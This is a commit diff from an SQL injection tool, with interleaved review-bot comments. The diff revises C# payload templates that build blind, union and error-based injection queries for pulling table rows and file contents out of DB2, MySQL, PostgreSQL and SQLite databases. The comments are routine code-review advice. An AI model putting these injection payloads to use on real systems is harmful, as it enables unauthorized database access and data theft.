20190111 V1.0 正式版---

修复PostgreSQL,盲注部分情况下某些字段作为排序字段会出错,导致无法获取数据的情况。
修复PostgreSQL、SQLite、DB2显错和Union注入获取时,部分数据类型无法转换和存在空值导致无法获取的情况。
修复日志处,复制payload报错问题。
This commit is contained in:
shack2
2019-01-10 22:27:46 +08:00
parent 57f795161b
commit 9f8c062123
13 changed files with 296 additions and 149 deletions


@@ -46,7 +46,7 @@ namespace SuperSQLInjection.payload
//bool方式获取值
public static String bool_value = " ascii(substr({data},{index},1))>{len}";
public static String cast_value = "rtrim(cast({data} as char(254)))";
public static String cast_value = "coalesce(rtrim(cast({data} as char(254))),chr(32))";
//获取行数据
public static String data_value = "(select "+ cast_value + " from (select {allcolumns},rownumber() over() rownum from {dbname}.{table}) t where t.rownum={index})";


@@ -63,8 +63,8 @@ namespace SuperSQLInjection.payload
//获取行数据bool
public static String data_value = "(select {columns} from `{dbname}`.`{table}` limit {index},1)";
//获取数据bool,加入orderby解决获取数据时获取到的数据每一行可能不对称的可能
public static String data_value_orderBy = "(select {columns} from `{dbname}`.`{table}` order by {orderby} limit {index},1)";
//获取数据bool,加入orderby解决盲注获取数据时,获取到的数据每一行可能不对称的可能
public static String bool_data_value = "(select {column} from (select {columns} from `{dbname}`.`{table}` limit {index},1)tmp)";
//union获取数据条数
public static String data_count = "(select count(*) from `{dbname}`.`{table}`)";
@@ -363,9 +363,9 @@ namespace SuperSQLInjection.payload
}
public static String getBoolDataPayLoad(String column, String orderBy, String dbName, String table, int index)
public static String getBoolDataPayLoad(String column,List<String> columns, String dbName, String table, int index)
{
String data = data_value_orderBy.Replace("{columns}", column).Replace("{orderby}", orderBy).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index + "");
String data = bool_data_value.Replace("{column}", column).Replace("{columns}", String.Join(",",columns)).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index + "");
return data;
}
/// <summary>
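Review bot: The new `columns` parameter on getBoolDataPayLoad is undocumented, although this file documents its payload builders with XML doc comments (the `/// <summary>` for the next method begins on the last line of the hunk, and the PostgreSQL file in the same commit carries `/// <param name="index">` lines). I would add `/// <param name="columns">all columns of the target row; they are joined with "," into the inner select of bool_data_value</param>` above the signature. It is also worth a sentence there that `String.Join` accepts an empty list and then yields `select  from`, so callers are expected to pass at least one column. The method body is fully inside the hunk.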


@@ -30,7 +30,6 @@ namespace SuperSQLInjection.payload
public static String bool_length = "char_length(cast({data} as text))";
public static String bool_value = "ascii(substring(cast({data} as text),{index},1))";
@@ -38,6 +37,8 @@ namespace SuperSQLInjection.payload
public static String substr_one_value = "(substring(cast({data} as text),{index},1))";
public static String substr_nocast = "(substring({data},{index},1))";
//获取数据库数量bool方式
public static String bool_db_count = " " + dbs_count + ">{len}";
@@ -56,6 +57,7 @@ namespace SuperSQLInjection.payload
//bool方式获取值
public static String ver_value = " "+ bool_value + ">{len}";
//bool方式获取值
public static String char_length_val = " " + char_length + ">{len}";
@@ -66,8 +68,8 @@ namespace SuperSQLInjection.payload
//获取行数据bool
public static String data_value = "(select {columns} from {dbname}.{table} offset {index} limit 1)";
//获取数据bool,加入orderby解决获取数据时获取到的数据每一行可能不对称的可能
public static String data_value_orderBy = "(select {columns} from {dbname}.{table} order by {orderby} offset {index} limit 1)";
//获取数据bool,利用子查询,防止数据每一行可能存在不对称的可能
public static String data_value_order = "(select {column} from (select {columns} from {dbname}.{table} offset {index} limit 1)tmp)";
//union获取数据条数
public static String data_count = "(select count(*) from {dbname}.{table})";
@@ -128,11 +130,23 @@ namespace SuperSQLInjection.payload
/// <param name="index">第几行数据1开始</param>
public static String getErrorDataValue(String dbname, String table, int index, List<String> columns)
{
String data = data_value.Replace("{columns}", Comm.unionColumns(columns, "||chr(36)||chr(36)||chr(36)||"));
String data = data_value.Replace("{columns}", unionColumns(columns, "||chr(36)||chr(36)||chr(36)||"));
String d = data.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index.ToString());
return error_value.Replace("{data}", d);
}
public static String unionColumns(List<String> columns, String unionStr)
{
StringBuilder sb = new StringBuilder();
foreach (String column in columns)
{
sb.Append("coalesce(cast(" + column + " as text),chr(32))" + unionStr);
}
sb.Remove(sb.Length - unionStr.Length, unionStr.Length);
return sb.ToString();
}
public static String getReadFilePayload(String path)
{
return readFile.Replace("{path}", path);
@@ -169,7 +183,7 @@ namespace SuperSQLInjection.payload
public static String getUnionDataValue(int columnsLen, int showIndex, List<String> columns, String dbname, String table, String index)
{
StringBuilder sb = new StringBuilder();
String data = "chr(94)||chr(94)||chr(33)||" + Comm.unionColumns(columns, "||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns, "||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)
@@ -201,9 +215,9 @@ namespace SuperSQLInjection.payload
}
public static String getBoolDataPayLoad(String column, String orderBy, String dbName, String table, int index)
public static String getBoolDataPayLoad(String column, List<String> columns, String dbName, String table, int index)
{
String data = data_value_orderBy.Replace("{columns}", column).Replace("{orderby}", orderBy).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index + "");
String data = data_value_order.Replace("{column}", column).Replace("{columns}", String.Join(",", columns)).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index + "");
return data;
}
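Review bot: The new unionColumns helper (hunk `@@ -128,11 +130,23 @@`) throws ArgumentOutOfRangeException when `columns` is empty, because `sb.Remove(sb.Length - unionStr.Length, unionStr.Length)` runs unconditionally and the start index goes negative when nothing was appended. A guard keeps the trailing-separator removal safe: `if (sb.Length >= unionStr.Length) sb.Remove(sb.Length - unionStr.Length, unionStr.Length);`. The same helper, differing only in the coalesce expression, is copied into the SQLite payload class by this commit and has the identical problem; a shared implementation taking the per-dialect wrapper as a parameter would avoid the two copies drifting apart. The helper also lacks the `/// <summary>`/`/// <param>` block used elsewhere in this file; a one-line summary such as "Joins the column list with unionStr, wrapping each column in coalesce so a null value does not null the whole concatenation" would do.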


@@ -52,12 +52,12 @@ namespace SuperSQLInjection.payload
public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, List<String> columns, String table, String index)
{
StringBuilder sb = new StringBuilder();
String data = "char(94)||char(94)||char(33)||" + Comm.unionColumns(columns, "||char(36)||char(36)||char(36)||") + "||char(33)||char(94)||char(94)";
String data = "char(94)||char(94)||char(33)||" + unionColumns(columns, "||char(36)||char(36)||char(36)||") + "||char(33)||char(94)||char(94)";
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)
{
sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{table}", table).Replace("{index}", index));
sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", unionColumns(columns, ",")).Replace("{table}", table).Replace("{index}", index));
sb.Append(",");
}
else
@@ -69,6 +69,18 @@ namespace SuperSQLInjection.payload
return union_value.Replace("{data}", sb.ToString());
}
public static String unionColumns(List<String> columns, String unionStr)
{
StringBuilder sb = new StringBuilder();
foreach (String column in columns)
{
sb.Append("coalesce("+column+",char(32))"+unionStr);
}
sb.Remove(sb.Length - unionStr.Length, unionStr.Length);
return sb.ToString();
}
public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, String dataPayLoad)
{
StringBuilder sb = new StringBuilder();
@@ -88,7 +100,7 @@ namespace SuperSQLInjection.payload
}
public static String getBoolDataPayLoad(String column, List<String> columns, String dbName, String table, int index)
{
String data = data_value.Replace("{data}", column).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{orderby}", columns[0]);
String data = data_value.Replace("{data}", column).Replace("{allcolumns}", unionColumns(columns, ",")).Replace("{orderby}", columns[0]);
String payload = data.Replace("{dbname}", dbName).Replace("{table}", table).Replace("{data}", column).Replace("{index}", index.ToString());
return payload;
}
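Review bot: In getBoolDataPayLoad the second `.Replace("{data}", column)` on the `payload` line is redundant, since the `data` line directly above already substituted every `{data}` occurrence in `data_value`; dropping it makes the two-step substitution easier to follow. The `columns[0]` used for `{orderby}` is indexed without a check and throws ArgumentOutOfRangeException on an empty list, which is worth stating in a doc comment such as `/// <param name="columns">non-empty list of the row's columns; the first one is used as the order key</param>`, as this file otherwise leaves the method undocumented. The method is fully contained in the hunk.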